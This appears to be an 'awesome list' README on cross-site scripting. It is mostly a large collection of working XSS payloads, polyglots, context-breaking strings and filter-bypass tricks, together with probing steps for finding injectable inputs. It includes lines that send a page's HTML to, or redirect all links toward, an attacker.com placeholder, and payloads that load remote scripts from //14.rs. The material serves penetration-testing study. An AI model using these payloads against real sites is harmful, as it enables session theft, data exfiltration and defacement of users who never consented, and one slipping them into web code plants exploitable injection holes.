An ongoing curated collection of awesome XSS software, libraries, frameworks, learning tutorials & practical resources cross-site scripting. Thanks to all contributors, you're awesome and wouldn't be possible without you! Our goal is to build a categorized community-driven collection of very well-known resources.

Cross-site Scripting (XSS) is a client-side code injection attack. Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application.

• Challenges
• Reads & Presentations
• Tools
• Mind maps
• DOM XSS
• Payloads
• Polyglots
• Tags and event handlers
• Context breaking
  • HTML context
  • Attribute context
  • JavaScript context
• Confirm Variants
• Exploits
• Probing
• Bypassing
• Encoding
• Tips & tricks

• prompt.ml
• alf.nu/alert1
• s-p-o-o-k-y.com
• xss-game.appspot.com
• polyglot.innerht.ml
• sudo.co.il/xss
• hack.me/t/XSS
• root-me.org
• chefsecure.com
• wechall.net
• codelatte.net/xss

• Bypassing XSS Detection Mechanisms
• XSS in Sarahah
• XSS in Facebook via PNG Content Type
• How I met your girlfriend
• How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour
• Blind XSS
• Copy Pest

• XSStrike
• xsshunter.com
• BeEF
• JShell

A beautiful XSS mind map by Jack Masa, here

• Does your input go into a sink? Vulnerable
• It doesn't? Not vulnerable

Source: An input that could be controlled by an external (untrusted) source.

document.URL document.documentURI document.URLUnencoded (IE 5.5 or later Only) document.baseURI location location.href location.search location.hash location.pathname document.cookie document.referrer window.name history.pushState() history.replaceState() localStorage sessionStorage 

Sink: A potentially dangerous method that could lead to a vulnerability. In this case a DOM Based XSS.

eval Function setTimeout setInterval setImmediate execScript crypto.generateCRMFRequest ScriptElement.src ScriptElement.text ScriptElement.textContent ScriptElement.innerText anyTag.onEventName document.write document.writeln anyElement.innerHTML Range.createContextualFragment window.location document.location 

This comprehensive list of sinks and source is taken from domxsswiki.

<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z <d3"<"/onclick="1>[confirm``]"<">z <d3/onmouseenter=[2].find(confirm)>z <details open ontoggle=confirm()> <script y="><">/*<script* */prompt()</script <w="/x="y>"/ondblclick=`<`[confir\u006d``]>z <a href="javascript%26colon;alert(1)">click <a href=javas&#99;ript:alert(1)>click <script/"<a"/src=data:=".<a,[8].some(confirm)> <svg/x=">"/onload=confirm()// <--`<img/src=` onerror=confirm``> --!> <svg%0Aonload=%09((pro\u006dpt))()// <sCript x>(((confirm)))``</scRipt x> <svg </onload ="1> (_=prompt,_(1)) ""> <!--><script src=//14.rs> <embed src=//14.rs> <script x=">" src=//15.rs></script> <!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //> <iframe/src \/\/onload = prompt(1) <x oncut=alert()>x <svg onload=write()> 

Here's an XSS polyglot that I made which can break out of 20+ contexts:

%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">` 

Explanation of how it works, here

• 105 Event Handlers with description
• 200 Event Handlers without description

Some less detected event handlers

ontoggle onauxclick ondblclick oncontextmenu onmouseleave ontouchcancel 

Some HTML Tags that you will be using

img svg body html embed script object details isindex iframe audio video 

Case: <tag>You searched for $input. </tag>

<svg onload=alert()> </tag><svg onload=alert()> 

Case: <tag attribute="$input">

"><svg onload=alert()> "><svg onload=alert()><b attr=" " onmouseover=alert() " "onmouseover=alert()// "autofocus/onfocus="alert() 

Case: <script> var new something = '$input'; </script>

'-alert()-' '-alert()//' '}alert(1);{' '}%0Aalert(1);%0A{' </script><svg onload=alert()> 

Yep, confirm because alert is too mainstream.

confirm() confirm`` (confirm``) {confirm``} [confirm``] (((confirm)))`` co\u006efirm() new class extends confirm``{} [8].find(confirm) [8].map(confirm) [8].some(confirm) [8].every(confirm) [8].filter(confirm) [8].findIndex(confirm) 

Array.from(document.getElementsByTagName("a")).forEach(function(i) { i.href = "https://attacker.com"; });

<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

A good compilation of advanced XSS exploits can be found here

If nothing of this works, take a look at Awesome Bypassing section

First of all, enter a non-malicious string like d3v and look at the source code to get an idea about number and contexts of reflections.
Now for attribute context, check if double quotes (") are being filtered by entering x"d3v. If it gets altered to x"d3v, chances are that output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering x'd3v, if it gets altered to x', you are doomed. The only thing you can try is encoding.
If the quotes are not being filtered, you can simply try payloads from Awesome Context Breaking section.
For javascript context, check which quotes are being used for example if they are doing

variable = 'value' or variable = "value" 

Now lets say single quotes (') are in use, in that case enter x'd3v. If it gets altered to x\'d3v, try escaping the backslash () by adding a backslash to your probe i.e. x\'d3v. If it works use the following payload:

\'-alert()// 

But if it gets altered to x\\\'d3v, the only thing you can try is closing the script tag itself by using

</script><svg onload=alert()> 

For simple HTML context, the probe is x<d3v. If it gets altered to x>d3v, proper sanitization is in place. If it gets reflected as it as, you can enter a dummy tag to check for potential filters. The dummy tag I like to use is x<xxx>. If it gets stripped or altered in any way, it means the filter is looking for a pair of < and >. It can simply bypassed using

<svg onload=alert()// 

or this (it will not work in all cases)

<svg onload=alert() 

If the your dummy tags lands in the source code as it is, go for any of these payloads

<svg onload=alert()> <embed src=//14.rs> <details open ontoggle=alert()> 

Note: None of these payloads use single (') or double quotes (").

• Without event handlers

<object data=javascript:confirm()> <a href=javascript:confirm()>click here <script src=//14.rs></script> <script>confirm()</script> 

• Without space

<svg/onload=confirm()> <iframe/src=javascript:alert(1)> 

• Without slash (/)

<svg onload=confirm()> <img src=x onerror=confirm()> 

• Without equal sign (=)

<script>confirm()</script> 

• Without closing angular bracket (>)

<svg onload=confirm()// 

• Without alert, confirm, prompt

<script src=//14.rs></script> <svg onload=co\u006efirm()> <svg onload=z=co\u006efir\u006d,z()> 

• Without a Valid HTML tag

<x onclick=confirm()>click here <x ondrag=aconfirm()>drag it 

• Bypass tag blacklisting

</ScRipT> </script </script/> </script x> 

• http(s):// can be shortened to // or /\\ or \\.
• document.cookie can be shortened to cookie. It applies to other DOM objects as well.
• alert and other pop-up functions don't need a value, so stop doing alert('XSS') and start doing alert()
• You can use // to close a tag instead of >.
• I have found that confirm is the least detected pop-up function so stop using alert.
• Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use <script src=//14.rs> instead of <script src="//14.rs">
• The shortest HTML context XSS payload is <script src=//14.rs> (19 chars)

^ back to top ^

MIT License & cc license

This work is licensed under a Creative Commons Attribution 4.0 International License.

To the extent possible under law, Paul Veillard has waived all copyright and related or neighboring rights to this work.